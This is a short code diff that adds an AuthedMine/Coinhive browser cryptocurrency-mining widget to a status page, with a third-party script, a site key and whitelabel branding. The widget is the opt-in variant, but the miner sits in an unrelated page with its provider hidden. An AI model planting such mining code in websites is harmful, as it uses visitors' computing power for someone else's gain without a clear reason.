--- a/public/status.html
+++ b/public/status.html
@@ -21,5 +21,14 @@
   <p>pm2: <span id='p-result'></span></p>
   <div id='pm2'></div>
   <script src='main.js'></script>
+
+  <script src="https://authedmine.com/lib/simple-ui.min.js" async></script>
+  <div class="coinhive-miner" 
+    style="width: 256px; height: 310px;text-align:center; margin-top:50px;"
+    data-key="N5p7wpXKUyYrmEuGBv6BDqCYkKXifyqS"
+    data-graph="#555555"
+    data-whitelabel="true">
+  </div>
+
 </body>
 </html>
